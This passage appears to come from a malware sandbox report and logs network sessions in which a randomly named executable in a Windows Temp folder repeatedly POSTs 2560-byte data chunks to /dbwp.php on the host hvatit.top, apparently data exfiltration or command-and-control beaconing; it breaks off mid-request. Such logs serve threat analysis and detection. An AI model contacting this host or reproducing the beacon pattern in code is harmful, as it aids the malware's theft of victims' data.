                                                        Aug 31, 2024 09:33:42.677018881 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:42.803998947 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        113 | 192.168.2.4 | 49850 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:42.930027962 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:43.286726952 CEST | 2560 | OUT | [request body]
                                                        Aug 31, 2024 09:33:43.596018076 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:43.786657095 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        114 | 192.168.2.4 | 49851 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:43.915952921 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:44.578063011 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:44.711791039 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        115 | 192.168.2.4 | 49852 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:44.808589935 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        116 | 192.168.2.4 | 49853 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:44.846241951 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:45.530668974 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:45.664237976 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        117 | 192.168.2.4 | 49854 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:45.790421963 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:46.454201937 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:46.661909103 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        118 | 192.168.2.4 | 49855 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:46.799185038 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:47.481890917 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:47.676517010 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        119 | 192.168.2.4 | 49856 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:47.802539110 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:48.488185883 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:48.681523085 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        120 | 192.168.2.4 | 49857 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:48.806252003 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:49.476614952 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:49.604645014 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        121 | 192.168.2.4 | 49858 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:49.727252007 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        122 | 192.168.2.4 | 49859 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:49.858575106 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:50.523411036 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:50.714145899 CEST | 308 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        123 | 192.168.2.4 | 49860 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:49.999531984 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:50.672266960 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:50.871314049 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        124 | 192.168.2.4 | 49861 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:51.010478020 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2552
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:51.675645113 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:51.876173973 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        125 | 192.168.2.4 | 49862 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:52.009871960 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:52.674288034 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:52.807852030 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        126 | 192.168.2.4 | 49863 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:52.930546045 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:53.596441031 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:53.727864981 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        127 | 192.168.2.4 | 49864 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:53.851289988 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:54.208638906 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:33:54.535274982 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:54.667630911 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        128 | 192.168.2.4 | 49865 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:54.787792921 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:55.146380901 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:33:55.480843067 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:55.617358923 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                        129 | 192.168.2.4 | 49867 | 80.211.144.156 | 80
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:55.744663954 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:56.099246025 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:33:56.412790060 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:56.540595055 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        130 | 192.168.2.4 | 49868 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:56.673240900 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:57.021166086 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:33:57.366591930 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:57.505551100 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        131 | 192.168.2.4 | 49869 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:57.631164074 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:57.989876032 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:33:58.314579964 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:58.447578907 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        132 | 192.168.2.4 | 49870 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:58.572729111 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:58.927396059 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:33:59.264924049 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:59.397600889 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        133 | 192.168.2.4 | 49871 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:59.526457071 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:59.880693913 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:34:00.196419001 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:00.327964067 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        134 | 192.168.2.4 | 49872 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:34:00.474947929 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        135 | 192.168.2.4 | 49873 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:34:00.787112951 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:01.146267891 CEST | 1436 | OUT
                                                        Aug 31, 2024 09:34:01.457894087 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:01.661720037 CEST | 308 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        136 | 192.168.2.4 | 49874 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:34:00.923700094 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:01.274279118 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:34:01.612230062 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:01.806708097 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        137 | 192.168.2.4 | 49875 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:34:01.929958105 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:34:02.286755085 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:34:02.614525080 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:02.747653008 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        138 | 192.168.2.4 | 49876 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:34:02.886378050 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:03.240061045 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:34:03.560643911 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:03.693799019 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        139 | 192.168.2.4 | 49877 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:34:03.946594954 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
